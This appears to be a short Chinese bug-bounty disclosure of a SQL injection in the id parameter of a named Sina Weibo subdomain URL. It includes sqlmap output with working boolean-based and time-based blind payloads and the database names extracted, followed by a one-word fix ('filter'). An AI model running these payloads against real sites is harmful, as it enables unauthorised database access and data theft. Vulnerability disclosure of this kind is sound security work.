新浪微博某分站SQL注入一枚

rt

漏洞地址: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31

id参数存在注入
 

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21000040 AND 2081=2081&period=day&date=20160329&from=class&from_id=332

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=21000040 AND (SELECT * FROM (SELECT(SLEEP(5)))NBaZ)&period=day&date=20160329&from=class&from_id=332
---
[02:13:34] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[02:13:34] [INFO] fetching database names
[02:13:34] [INFO] fetching number of databases
[02:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:13:34] [INFO] retrieved: 
[02:13:36] [WARNING] reflective value(s) found and filtering out
3
[02:13:45] [INFO] retrieved: information_schema
[02:16:50] [INFO] retrieved: test
[02:17:39] [INFO] retrieved: top
available databases [3]:
[*] information_schema
[*] test
[*] top

已证明

解决方案：

过滤